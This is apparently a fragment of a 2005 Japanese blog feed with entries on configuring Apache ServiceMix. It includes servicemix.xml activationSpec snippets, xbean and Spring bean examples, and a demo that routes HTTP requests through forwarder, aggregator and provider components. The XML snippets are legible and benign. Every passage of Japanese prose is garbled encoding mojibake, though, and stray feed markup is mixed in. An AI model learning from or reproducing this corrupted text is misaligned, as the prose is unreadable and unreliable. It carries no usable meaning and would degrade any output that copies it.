    -¡¡₪₪ף₪ֻ₪»₪טServiceMix₪ֿ₪₪ְ₪₪ְָ¯ֵ¸ֵ׃¾ו₪ַ₪¹¡£₪₪־₪ַ£»¨₪₪³₪ָ₪ע₪µ₪»₪כ₪ָ₪«¡¢¶ָּ³¥¢¥׳¥ך₪ֻ»ָ₪¦₪ָ₪₪₪ֳ₪¿¾ל¹ח₪ֻ₪ֿ½½¬₪ֳֻם°ױ₪·₪ֶ₪¯₪ְ₪µ₪₪¡£¥׀¡¼¥¸¥ח¥ף2.0₪ָ₪₪₪ֳ₪ֶ₪ג¡¢¥¡¼¥¿₪°₪י₪₪₪־µ₪»‎₪ֱ₪ַ¸«₪ֶ₪¢₪²₪כ₪ָ־ֹ₪₪₪ַ₪·₪ח₪¦¡£÷£¸ו¡¢¹­₪¯ֹבµ₪·₪ֶ₪₪₪¯₪ֻ₪·₪¿₪¬₪ֳ₪ֶ»ָ₪₪‎₪¬¸¡ֶ₪₪µ₪ל₪ֶ₪₪₪¯₪ָ»׳₪ֳ₪ֶ₪₪₪₪¹¡£

    - -


    -¡¡₪³₪ל₪ַ°לִּ₪ך₪־¥ַ¥ג¥¢¥׳¥ך²עְג₪ֿ½×־»₪ַ₪¹¡£₪₪ֻ₪«₪¢₪ל₪׀¥¨¥ף¥ָ¥ך₪עִֹ²ֳ₪·₪₪¹¡£₪ג₪·₪¯₪ֿ²עְג₪·₪ֶֽ₪·₪₪₪³₪ָ₪¬₪¢₪ל₪׀¥ב¡¼¥כ¡yusuke₪¢₪ֳ₪ָarclamp.jp¡ֻ₪«¥³¥ב¥ף¥ָ₪ע₪¯₪ְ₪µ₪₪₪₪»¡£

    - -


    -₪³₪־ServiceMixֿ¢÷₪־°לֽק

    ]]>
    -servicemix -yusuke -2005-12-16T12:12:52+09:00 -
    - -ServiceMix (4) ¥ַ¥ג¥¢¥׳¥ך₪־servicemix.xml -http://www.arclamp.jp/blog/archives/000743.html -¡¡₪₪₪ט₪₪₪ט¥ַ¥ג¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪־ְגְּ₪ַ₪¹¡¥ַ¥ג₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ֿServiceMix (1) JBI₪ָServiceMix ₪«₪י¡ֻ¡£

    - -

    ¡¡ServiceMix (2) ¥ַ¥ג¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף³µֽ׳₪־¡ײServiceMixֶג₪־³µֽ׳¡׳₪ֱֹֻ₪₪₪¿¿₪ע¡¢₪ג₪¦°לֵ÷₪»₪₪¹¡¥¯¥ך¥ֳ¥¯₪ַ³ֲָח¡ֻ¡£

    - -

    - -

    ¡¡¥ַ¥ג₪ַ₪ֿ2₪ִ₪־SeriviceMix₪¬µ¯ֶ°₪·₪ֶ₪₪₪₪¹¡£₪³₪³₪ַ₪ֿ¥ב¥₪¥ף₪ֻ₪₪כ²טּּ₪עֹ½¼¨₪¹₪כֲ¦¡÷¸ֲ¦¡ֻ₪־ServiceMix₪ע¸«₪ֶ¹װ₪­₪₪¹¡£ְִך¥ױ¥¡¥₪¥כ₪ַ₪¢₪כservicemix.xml₪ֿ¡¢src\webapp\WEB-INF\servicemix.xml₪ַ₪¹¡£

    - -

    ¡¡servicemix¾ו₪־־®₪ל₪ע¸«₪כ₪¿₪ב₪ֻ₪ֿ¡¢ֽ׳ֱַsm:activationSpec₪־ֲ°ְ­destinationService₪ִֻךµֱ₪µ₪ל₪¿¥µ¡¼¥׃¥¹ּ¾₪ע¸«₪ֶ₪₪₪±₪׀₪ט₪₪₪³₪ָ₪ֻ₪₪ך₪₪¹¡£

    - -

    httpBinding¡HTTP₪־¥ך¥¯¥¨¥¹¥ָ₪עJBI₪ֻ־®₪·¹‏₪א₪¿₪ב₪־BC¡ֻ
    -¼ץ₪±¼ט₪ֳ₪¿₪י¡¢₪½₪־₪₪foo:asyncForwarder₪ֻ־®₪·₪₪¹¡£
    -

      <sm:activationSpec componentName="httpBinding"   
    -      service="foo:httpBinding"
    -      destinationService="foo:asyncForwarder">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="org.servicemix.components.http.HttpInOutBinding" />
    -    </sm:component>
    -  </sm:activationSpec>
    -

    - -


    -asyncForwarder¡HTTP₪־ֶ±´¥ב¥ֳ¥»¡¼¥¸₪עָףֶ±´₪ְֻ₪ךֲ״₪¨₪כ¡ֻ
    -foo:findAggregator₪ֲֻ׀₪·₪ֶָףֶ±´₪ַ¥ב¥ֳ¥»¡¼¥¸₪עֱק₪ך₪₪¹¡£foo:httpBinding₪«₪י₪ֶֿ±´½טֽ‎₪ַ¸ֶ₪׀₪ל₪ֶ₪₪₪כ₪־₪ַ¡¢µ¢₪ך₪־½טֽ‎₪ֿ¥ב¥ֳ¥»¡¼¥¸₪ֻײ¿®₪¹₪ל₪׀¼«ֱ³₪ֻּב₪ֳ₪ֶ₪₪₪­₪₪¹¡£
    -

      <sm:activationSpec componentName="asyncForwarder"   
    -      service="foo:asyncForwarder"
    -      destinationService="foo:findAggregator">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="demo.servicemix.se.AsyncForwarder" />
    -    </sm:component>
    -  </sm:activationSpec>
    -

    - -


    -findAggregator¡»״ִך₪µ₪ל₪¿¥µ¡¼¥׃¥¹₪עֶ±»‏¡¦ָףֶ±´₪ֻ¸ֶ₪׃½׀₪·¡¢·כ²ּ₪ע½¸ְׁ₪¹₪כ¡ֻ
    -¡¡₪³₪³₪ַ₪ֿtargets₪ֻ»״ִך₪µ₪ל₪¿InfoProviderֳ£₪ֻ¾נף₪עָףֶ±´₪ֶֻ±»‏¼ֲ¹װ₪¹₪כ₪¿₪ב¡¢½ח¼¡¡¢¼ֲ¹װ·כ²ּ₪¬ּב₪ֳ₪ֶ₪­₪₪¹¡£₪½₪־¿פ₪ע¿פ₪¨₪ֶ¡¢ֱ´₪ֶ½¸₪₪ֳ₪¿₪י·כ²ּ₪ע£±₪ִ₪־XML¥ױ¥¡¥₪¥כ₪ֻ₪·₪ֶּב₪·₪₪¹¡£₪½₪־₪¿₪בdestinationService₪ָ₪ּֿב₪ךְט₪ַ₪¢₪כfoo:asyncForwarder₪ֻ₪₪ך₪₪¹¡£
    -

      <sm:activationSpec componentName="findAggregator"   
    -      service="foo:findAggregator"
    -      destinationService="foo:asyncForwarder">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="demo.servicemix.se.FindAggregator" >
    -        <property name="targets">
    -          <list>
    -            <value>provider1</value>
    -            <value>provider2</value>
    -            <value>exProvider</value>
    -          </list>
    -        </property>
    -      </bean>
    -    </sm:component>
    -  </sm:activationSpec>
    -

    - -


    -provider1¡¼ֲ÷₪־¥׳¥ם¥׀¥₪¥ְ¡ֻ
    -¡¡₪½₪ל₪¾₪ל₪־InfoProvider₪ֿ¡¢½טֽ‎¸וfoo:findAggregator₪ֻּב₪ך₪₪¹¡£
    -

      <sm:activationSpec componentName="provider1"   
    -      service="foo:provider1"
    -      destinationService="foo:findAggregator">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="demo.servicemix.se.Adaptor">
    -        <property name="infoProvider">
    -          <bean class="demo.info.impl.InfoProviderImpl1" />
    -        </property>
    -      </bean>
    -    </sm:component>
    -  </sm:activationSpec>
    -

    - -


    -exProvider¡ּ¥µ¡¼¥׀¡¦¥₪¥ף¥¹¥¿¥ף¥¹₪־InfoProvider₪ע¸ֶ₪׃½׀₪¹¡ֻ
    -¡¡₪³₪ל₪גּב₪ךְט¼«ֲ־₪ֿfoo:findAggregator₪ַ₪¹¡£
    -

      <sm:activationSpec componentName="exProvider"   
    -      service="foo:exProvider"
    -      destinationService="foo:findAggregator">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="demo.servicemix.se.ExHttp">
    -        <property name="outBoundName" value="exServiceOutBound" />
    -      </bean>
    -    </sm:component>
    -  </sm:activationSpec>

    - -

      <sm:activationSpec componentName="exServiceOutBound"   
    -      service="foo:exServiceOutBound" >
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="org.servicemix.components.http.HttpInvoker">
    -        <property name="url" value="http://localhost:8912"/>
    -      </bean>
    -    </sm:component>
    -  </sm:activationSpec>
    -

    - -


    -¡¡₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ָף¾ן₪ִֻ¾´¶ֵ×₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«¡£₪ג₪ֱ₪ם₪ףֳ±½ד₪ְ₪«₪י₪ָ₪₪₪¦₪³₪ָ₪ג₪¢₪ך₪₪¹₪¬¡¢¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪־¥ױ¥ם¡¼₪¬₪ט₪¯¬₪«₪ך₪₪¹¡£

    - -

    ¡¡₪ִ₪₪ך¡¢₪³₪־¥ַ¥ג¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪ָ₪₪₪¦₪־₪ֿ¡¢ServiceMix₪ֻ₪ט₪ֳ₪ֶ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ָ¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪ֱַָ₪¾ו₪²₪י₪ל₪¿₪ג₪־₪₪ן₪±₪ַ₪¹¡£₪·₪«₪ג¡¢₪½₪־ֱָ₪¹ח₪ן₪»‎₪¬¡ײֶ±´₪ַ¸ֶ₪׀₪ל₪ֶ₪₪₪¿₪ג₪־₪ע¡¢ֶגֹפֵ×₪ֻ₪ָֿףֶ±´ֶ±»‏₪ַ¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ע½טֽ‎₪¹₪כ¡׳₪ָ₪₪₪¦¡¢₪½₪ל₪₪ך₪ֻ£»¨₪₪ג₪־₪ַ₪¹¡£
    -¡¡₪½₪־₪¿₪ב₪ֻInfoProvider°³°₪ֿ¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ַ₪ֿ₪₪¯¥³¥ף¥ָ¥ם¡¼¥כ₪ָ₪·₪ֶµ¡ַ½₪·₪ֶ₪₪₪₪¹¡£asyncForwarder₪ֶֿ±´¡¦ָףֶ±´₪־ְ₪ךֲ״₪¨₪ַ₪¢₪ך¡¢findAggregator₪ָֿףֶ±´¼ֲ¹װ₪ָ¼ֲ¹װ·כ²ּ₪־½¸ּף₪ָ₪₪₪¦¥³¥ף¥ָ¥ם¡¼¥כ₪₪־₪ַ₪¹¡£
    -¡¡¡ײ₪³₪ף₪₪ֱָֻ₪¹ח₪ן₪»₪כ₪₪ף₪ֶ₪ב₪ף₪ֹ₪¦₪ְ₪₪¡¡׳₪ָ´¶₪¸₪י₪ל₪כ₪«₪ג₪·₪ל₪₪»₪ף¡£₪·₪«₪·¡¢₪³₪־₪ט₪¦₪ֻ¥ם¥¸¥ֳ¥¯₪ָ¥³¥ף¥ָ¥ם¡¼¥כ₪¬ְּ³־₪ֻ¬־¥₪µ₪ל₪כ₪³₪ָ₪ַ¡¢¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪ָ₪·₪ֶׁ²½₪ֵֻ¬±‏₪ַ₪­₪כ²ִַ½ְ­₪¬₪¢₪כ₪³₪ָ₪ֻµ₪₪ֵ₪­₪₪¹¡£BC₪עׁ¹¹₪¹₪ל₪׀JMS₪הWeb¥µ¡¼¥׃¥¹₪«₪י₪ג¸ֶ₪׃½׀₪·²ִַ½₪ַ₪·₪ח₪¦₪·¡¢findAgregator₪־µ¡ַ½₪ע¾ו₪²₪ל₪׀¥¿¥₪¥א¥¢¥¦¥ָ₪₪ֹ₪ג¼ֲ¸½₪¹₪כ₪³₪ָ₪ג₪ַ₪­₪₪¹¡£₪ג₪ֱ₪ם₪ף¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ַ₪¢₪כInfoProvider₪עׁ¹¹₪¹₪כֹ¬ֽ׳ְ­₪ֿ₪¢₪ך₪₪»₪ף¡£

    - -

    ¡¡₪₪ס¢₪³₪¦₪₪₪ֳ₪¿¥¢¥₪¥ַ¥¢₪ֿEAI₪הBPM¡¥׃¥¸¥ֽ¥¹¡¦¥׳¥ם¥»¥¹¡¦¥¥ֽ¡¼¥¸¥ב¥ף¥ָ¡ֻ₪ָׁ₪ן₪כ₪₪₪₪ט₪¦₪ֻ´¶₪¸₪כ₪«₪ג₪·₪ל₪₪»₪ף¡£₪·₪«₪·¡¢₪³₪ל₪₪ַ₪־EIA₪הBPM₪ֿIF₪₪ֹ₪־ֳ±½ד₪½טֽ‎₪·₪«₪ַ₪­₪₪«₪ֳ₪¿₪־₪ָֻז₪₪כ₪ָ¡¢BPEL₪הJBI₪ֿ₪½₪־₪ט₪ך₪גֽ₪«₪ֻ÷₪«₪₪¾ו₪־½טֽ‎₪¬²ִַ½₪ֻ₪₪ך₪₪¹¡»׳₪₪½׀₪·₪ֶ₪¯₪ְ₪µ₪₪¡£BPEL₪ֿBusiness Process Execution Language for Web Services₪־־¬₪ַ₪¹¡ֻ¡£

    - -

    ¡¡₪³₪³₪ַ´¶₪¸₪ֶ₪₪₪¿₪ְ₪­₪¿₪₪₪־₪ֿ¡¢ServiceMix₪¬¼ֲ¸½₪·₪ֶ₪₪₪כ₪ג₪־₪¬¡¢₪­₪ֳ₪ָ³§₪µ₪ף₪¬»׳₪¦SOA₪ָ₪ֿ°לְ‏₪ע²ט₪·₪ֶ₪₪₪כ₪ָ₪₪₪¦₪³₪ָ₪ַ₪¹¡£ServiceMix₪ֻ₪ט₪ֳ₪ֶSOA₪־ֻ¼ֱ₪ַ₪¢₪כ¡ײ¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪ֻ₪ט₪כֱֲ·כ¹ח¡׳₪ָ₪₪₪¦₪־₪¬DI¥³¥ף¥ֶ¥₪ֻ»‎₪ֱ¹‏₪₪ל₪₪·₪¿¡£₪½₪־·כ²ּ¡¢SOAֵ×¥¢¥׳¥ם¡¼¥ֱ₪ֹֿבִּ₪־¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪־¹½ֳ₪ֻ₪×₪₪₪ֶ₪ג½½¬₪ֻֽרֽׁ²ִַ½₪ֻ₪₪ֳ₪¿₪ן₪±₪ַ₪¹¡£
    -¡¡ֻֽ₪ֿ₪³₪ל₪ע¡ײ¥³¥ף¥ֶ¥¥¡¼¥¹¡¦¥µ¡¼¥׃¥¹¡¦¥₪¥ף¥ֶ¥°¥ל¡¼¥·¥ח¥ף¡׳₪ָ¸ֶ₪ף₪ַ₪₪¿₪ן₪±₪ַ₪¹₪¬¡ײ¥³¥ף¥ֶ¥¥¡¼¥¹¡¦¥³¥ף¥¡¼¥ֽ¥ף¥ָ¡¦¥ך¥¥ֳ¥¯¥¹¡¥¥ֳ¥·¥ו¥¢¥ֳ¥׳¡ֻ¡׳₪ָ₪₪₪¦´¶₪¸₪־‎₪¬ְµ³־₪«₪ג₪·₪ל₪₪»₪ף¡IBM₪הBEA₪ע¼חֶ³₪ֻSCA¡¥µ¡¼¥׃¥¹¡¦¥³¥ף¥¡¼¥ֽ¥ף¥ָ¡¦¥¢¡¼¥­¥ֶ¥¯¥ֱ¥ד¡ֻ₪ָ₪₪₪¦¼ט₪ךֱָ₪₪ג₪ֿ₪¸₪₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¹₪¬¡¢₪½₪־ֳֿ₪ּֿ₪־µ¡²ס₪ֻ¡ֻ¡£

    - -

    ¡¡´»³ְטְ¸₪ֿ₪³₪־servicemix.xml₪ע¸«₪ֶ

    - -
    - ₪¿₪ְ¡¢ServiceMix₪־Xbean₪־µ­½ׂ₪ע¸«₪ֶ₪₪₪כ₪ָ¡¢DI¥³¥ף¥ֶ¥₪־ֳ±₪₪כ¥³¥ף¥ױ¥£¥°¡¦¥ױ¥¡¥₪¥כ₪ָ₪·₪ֶ°¾ו₪־°ױּ£₪ע¡¢₪½₪ל₪¬ְר÷ֵ×₪ֻ»‎₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪ֻµ₪₪ֵ₪¯¡£ - -

    - ₪½₪ל₪¬ֹ½¸½₪·₪ֶ₪₪₪כ₪ג₪־₪ע¡¢ֳ±₪₪כInject₪µ₪ל₪כ₪₪­¥×¥ײ¥¸¥§¥¯¥ָ₪־ְכ¸ְ₪ָ₪·₪ֶ₪ַ₪ֿ₪₪¯¡¢¥ֽ¥ֳ¥ָ¥ן¡¼¥¯¾ו₪־£¿פ₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪־·כ¹ח₪־ְִ¼ּ¿¿₪עֽ¿₪¨₪כ₪ג₪־₪ָ¹ֽ₪¨₪כ₪ַָּּע₪₪¡£

    - -

    - Gridֹק₪ֻ¸ְ₪¨₪׀¡¢₪½₪ל₪ֿVirtual Organization₪־¸«¼ט₪ך¿₪עֽ¿₪¨₪ֶ₪₪₪כ₪־₪ַ₪¢₪כ¡£

    - -

    - BPEL₪ג»ק₪¿₪ט₪¦₪ֳִֶ§₪ע₪ג₪ִ₪־₪ְ₪¬¡¢²ז¡¹₪ֿ¡¢¥ֽ¥ֳ¥ָ¥ן¡¼¥¯¾ו₪־¥µ¡¼¥׃¥¹₪ע¥׳¥ם¥°¥י¥א₪¹₪כ¡¢¿·₪·₪₪¥ב¥¿¡¦¥׳¥ם¥°¥י¥א¸ְ¸ל₪¬ְֲֳ¸₪¹₪כ»‏ֲו₪־ֶ‏₪ך¸‎₪ֻ־©₪ֳ₪ֶ₪₪₪כ₪־₪«₪ג₪·₪ל₪₪₪¡£

    - -

    ₪ָ»״ֵ¦₪µ₪ל₪ֶ₪₪₪₪¹¡£¼ד´³¡¢ֲח₪²₪µ₪ְ₪ָ₪ֿ»׳₪₪₪₪¹₪¬°ױ¿₪·₪ֶ₪₪₪כ´¶³׀₪ֱֵֿ₪ן₪כ₪־₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«¡£

    - -


    -¡¡₪ַ¡¢₪₪ף₪«·כְֿ₪י₪·₪₪₪ג₪־₪¬₪₪₪₪־₪ַ₪¹₪¬¡¢ֻֽ₪ג₪ֿ₪ֳ₪­₪ך₪ָ₪₪₪¨₪כ₪₪ֹ₪ֻ»ָ₪₪¹‏₪ף₪ַ₪₪₪₪₪₪־₪¬¸½¾ץ₪ַ₪¹¡£₪¿₪ְ¡¢₪³₪¦₪·₪¿¼ךֻ¡₪ע¶ָּ³¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪ֱָֻ₪¹‏₪ף₪ַ₪₪₪¯₪³₪ָ₪ַ¡¢¥ם¥¸¥ֳ¥¯₪ָ¥³¥ף¥ָ¥ם¡¼¥כ₪־¬־¥₪¬ְּ³־₪ֻ₪₪ך¡¢₪ט₪ך¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪־¹½ֲ₪₪¬½ְֶנ₪ֻ₪₪כ₪³₪ָ₪ֿ´ײ°ד₪₪₪₪₪₪ָ»׳₪₪₪₪¹¡₪ָ¡¢¿®₪¸₪¿₪₪£ק¡ֻ¡£
    -¡¡ֽטַ¯₪ֿ¡¢₪³₪¦₪·₪¿¹ֽ₪¨‎¡₪ג₪ֿ₪הSOA₪ָ₪₪₪¦°ץ¾₪«₪י₪ֿ־¥₪ל₪ֶ₪₪₪כ₪«₪ג₪·₪ל₪₪»₪ף₪¬¡ֻ₪ֻ₪ט₪כ¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף¹½ֳ₪¬ֲח₪­₪²ֲך₪ֻ₪₪כ₪³₪ָ₪ַ₪·₪ח₪¦¡£
    -¡¡EIAֵ×₪SOA₪ֻ¼ט₪ךֱָ₪ֹ¬ֽ׳ְ­₪ֿ₪₪ֳ₪¿₪¯₪₪₪₪־₪ַ₪¹₪¬¡¢₪³₪¦₪₪₪¦¾®₪µ₪SOA₪ֻ₪ֿ¡¢₪ֹ₪ף₪ֹ₪ף¼ך₪ע½׀₪·₪ֶ₪₪₪¿₪ְ₪­₪¿₪₪₪ָ»׳₪¦₪ן₪±₪ַ₪¹¡°ֲ₪₪₪·¡¢¼ך₪־ֶֿ₪¯ָֿ°ֿ₪ַ₪ַ₪­₪כ₪·¡ֻ¡£

    - -


    -¡¡₪ַ₪ֿ¡¢¼¡²ף₪ֿ»כְֵ₪עׁ₪¨₪ֶInfoProvider₪־»ֱֵָ₪₪ע¸«₪ֶ₪₪₪¹¡£₪³₪ל₪ֻ₪ט₪ֳ₪ֶ¡¢¸½¾ץ₪־ServiceMix₪־²ֲך₪¬¸«₪¨₪ֶ₪¯₪כ₪ֿ₪÷₪ַ₪¹¡£

    - -


    -₪³₪־ServiceMixֿ¢÷₪־°לֽק

    ]]>
    -servicemix -yusuke -2005-12-14T01:09:57+09:00 -
    - -ServiceMix (3) servicemix.xml₪־³µֽ׳ -http://www.arclamp.jp/blog/archives/000740.html -¡¡₪ַ₪ֿ¡¢₪₪₪ט₪₪₪טServiceMixֲֻ־₪־ֳֿ₪ֻ₪₪ֳ₪ֶ₪­₪₪¹¡¥ַ¥ג₪־¥ְ¥¦¥ף¥ם¡¼¥ֹ₪ֿServiceMix (1) JBI₪ָServiceMix ₪«₪י¡ֻ¡£

    - -

    ¡¡₪₪÷ServiceMix₪½₪־₪ג₪־₪־÷מ₪ך₪ע´ֳ±₪ְֻגְּ₪·₪ֶ₪×₪­₪₪·₪ח₪¦¡£ServiceMix₪ֿSpring¾ו₪ֶַ°₪­₪₪¹¡£¸½¾ץ₪ַ₪ֿSpring₪ֻ₪·₪«ֲ׀±‏₪·₪ֶ₪₪₪₪₪ֹפ¬₪ג₪¢₪ך₪₪¹₪¬¡¢ָז³׃ֵ×´ֳ±₪ֲֻ¾₪־DI¥³¥ף¥ֶ¥¾ו₪ֶַ°₪«₪¹₪³₪ָ₪ג½׀ֽט₪כ₪ֿ₪÷₪ַ₪¹¡ServiceMix1₪ֿGeronimo¾ו₪ֶַ°₪¯₪ט₪¦₪ֻ₪·₪ֶ₪₪₪כ¿ֽ₪¬₪₪₪₪·₪¿¡ֻ¡£

    - -

    ¡¡₪ֿ₪¸₪ב₪ֻ½ס₪₪₪¿ִּ₪ךJBI₪ַ₪ֿ¥³¥ף¥ֶ¥₪ֻBC₪הSE₪ע¥ַ¥׳¥ם¥₪₪·₪₪¹¡£₪½₪־₪¿₪ב₪־¥ַ¥׳¥ם¥₪¥ב¥ף¥ָ¡¦¥ַ¥£¥¹¥¯¥ך¥׳¥¿₪ָֿף¾ן₪ָֻׁ»¨₪ֻ₪₪ֳ₪ֶ₪₪₪₪¹¡£₪¢₪ָ₪ְַגְּ₪·₪₪¹₪¬¡¢ServiceMix₪ֿSpring₪עֽרֽׁ₪·₪ֶBC¡¢SE₪ע¥ַ¥׳¥ם¥₪₪¹₪כ₪־₪ַ¡¢¥ַ¥׳¥ם¥₪₪עֳ±½ד₪ֻ₪·₪ֶ₪×₪ך¡¢₪µ₪י₪ֻBC₪הSE₪עSpring₪־Bean₪ֶָ±₪¸₪ט₪¦₪ֻDI₪־ֲ׀¾₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£

    - -

    ¡¡₪³₪־₪¿₪ב₪ֻServiceMix2₪־ִךµֱ¥ױ¥¡¥₪¥כ₪ֻֽרֽׁ₪µ₪ל₪ֶ₪₪₪כ₪־₪¬xbean₪ַ₪¹¡£xbean₪ֿGeronimo¥׳¥ם¥¸¥§¥¯¥ָ₪«₪י₪־ְַֹ¸₪₪־₪ַ₪¹₪¬¡¢ְִך¥ױ¥¡¥₪¥כ₪ע״ֽר₪ֻ½ס₪¯₪¿₪ב₪־¥י¥₪¥ײ¥י¥ך₪ַ¡¢Spring₪ג¥µ¥¡¼¥ָ₪·₪ֶ₪₪₪₪¹¡£"Spring in Action" ₪־Craig Walls»ב₪¬¥ײ¥ם¥°₪ֻ½ס₪₪₪¿Spring Simplified with XBean₪ֻ₪₪ָ₪₪ֳ₪ֶ₪₪₪₪¹₪¬¡¢Spring₪־µ­½ׂ₪עֳ±½ד₪ֻ₪¹₪כ₪¿₪ב₪־1₪ִ₪־²ע·ט÷צ₪ָ₪·₪ֳֶםּ₪µ₪ל₪ֶ₪₪₪₪¹¡£
    -¡¡¾וµ­₪־¥¨¥ף¥ָ¥ך₪«₪י₪־ָ´¿ט₪ַ₪¹₪¬¡¢

    - -
    -<beans>
    -  <bean id="knight"
    -      class="....KnightOfTheRoundTable">
    -    <property name="moniker">
    -      <value>Bedivere</value>
    -    </property>
    -    <property name="quest">
    -      <ref bean="quest"/>
    -    </property>
    -  </bean>
    -</beans>
    -
    - -

    ¡¡₪ָ½ס₪¯₪ָ₪³₪ם₪ע

    - -
    -<beans>
    -  <knight id="knight" moniker="Bedivere"
    -      xmlns="http://springinaction.com/schemas/knight">
    -    <myQuest><quest/></myQuest>
    -  </knight>¡¡
    -<beans>
    -
    - -

    ¡¡₪ֳ₪ֶ´¶₪¸₪ַ½ס₪±₪ֱ₪ד₪₪₪₪¹¡£₪ִ₪₪ךֳִֶך₪־¥¯¥י¥¹₪עBean₪ָ₪·₪ֵֶ׀ֿ¿₪¹₪כ₪־₪ְֻלֽׁ₪־¥¿¥°₪¬»ָ₪¨₪כ₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¹¡£

    - -

    ¡¡¥³¥ף¥¡¼¥ֽ¥ף¥ָ¡¦¥³¥ף¥¥¸¥ֳ¥ָ₪עXML¥ױ¥¡¥₪¥כ₪ַֹ½¸½₪·₪ט₪¦₪ָ₪¹₪כ₪ָ¡¢¥¨¥¯¥ֶ¥ף¥·¥ח¥ף¡¦¥¥₪¥ף¥ָ₪־·ֱ¼°₪עְּ¼¨₪¹₪כ₪¿₪ב₪ְֻלֽׁ₪־XML₪־ֽ׳ֱַ¡¥¿¥°ּ¾¡ֻ₪הֲ°ְ­₪עִֹ²ֳ₪·₪¿₪¯₪₪ך₪₪¹¡£Tapestry₪־HiveMind₪ַ₪ֿ₪₪₪­₪₪ךֽ׳ֱַ₪עִֹ²ֳ₪·₪ֶ₪·₪₪¦₪־₪ַ₪¹₪¬¡¢₪½₪¦₪¹₪כ₪ָXML₪־¥׀¥ך¥ַ¡¼¥·¥ח¥ף₪¬ֽרֽׁ₪ַ₪­₪₪¯₪₪ך₪₪¹¡£xbean₪¬¥¹¥¡¼¥ָ₪₪־₪ּֿ¾ֱ°¶ץ´ײ₪ֻ₪ט₪ֳ₪ֶXML₪־¥׀¥ך¥ַ¡¼¥·¥ח¥ף₪עְ¸₪«₪·₪¿₪₪₪ַ־ֹ₪₪ְֵ₪ַ₪¹¡£₪³₪־¼ךֻ¡₪ֿ־®¹װ₪כ₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡¡ServiceMix₪ַ₪ֿJBI₪־¥µ¡¼¥׃¥¹ּ¾₪ה¥¨¥ף¥ֹ¥¥₪¥ף¥ָּ¾₪₪ֹ₪ע»״ִך₪¹₪כ₪¿₪ב₪ֻֽרֽׁ₪·₪ֶ₪₪₪₪¹¡£₪₪¸₪ב₪ֻSpring₪ַµ­½ׂ₪·₪ֶ₪₪₪כ₪ָָף¾ן₪ֻ¸«₪ֻ₪¯₪¯₪₪ֳ₪ֶ₪·₪₪¦₪־₪ַ₪¹₪¬¡¢xbean₪־₪×₪«₪²₪ַ₪«₪₪ךִ¾´¶ֵ×₪ֻ₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪־₪ַ₪¹¡£

    - -


    -¡¡₪ַ₪ֿ¡¢servicemix.xml₪־¸«‎₪עְגְּ₪·₪₪¹¡£₪₪÷¥µ¥ף¥׳¥כ₪ע¸«₪ֶ₪¯₪ְ₪µ₪₪¡£

    - -
    -<beans xmlns="http://xbean.org/schemas/spring/1.0"
    -    xmlns:spring="http://xbean.org/schemas/spring/1.0"
    -    xmlns:sm="http://servicemix.org/config/1.0"
    -    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    -    xsi:schemaLocation="
    -        http://xbean.org/schemas/spring/1.0 spring-beans.xsd
    -        http://servicemix.org/config/1.0 servicemix.xsd"
    -    xmlns:foo="http://servicemix.org/demo/"> ...[1]
    - 
    -  <sm:container spring:id="jbi"
    -    useMBeanServer="false"
    -    createMBeanServer="false"
    -    dumpStats="true"
    -    statsInterval="10"> ...[2]
    - 
    -    <sm:activationSpecs>
    - 
    -      <sm:activationSpec id="hoge"
    -          service="foo:hoge"
    -          destinationService="foo:bar">  ...[3]
    -        <sm:component> ...[4]
    -          <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -              class="foo.Hoge" /> ...[5]
    -        </sm:component>
    -      </sm:activationSpec>  
    - 
    -      <sm:activationSpec ...
    - 
    -    <sm:activationSpecs>
    - 
    -  </sm:container>
    - 
    -<beans>
    -
    - -

    ¡¡ֽ׳ֱַbeans[1]₪ֿxbean₪־₪¿₪ב₪ֻXML¥¹¥­¡¼¥₪עְִך₪·₪ֶ₪₪₪₪¹¡£ֲ°ְ­xmlns:foo₪ֿ¡¢₪¢₪ָ₪ַ½׀₪ֶ₪­₪₪¹₪¬¥µ¡¼¥׃¥¹₪־₪¿₪ב₪־ּ¾ֱ°¶ץ´ײfoo₪עִךµֱ₪·₪ֶ₪₪₪₪¹¡£

    - -

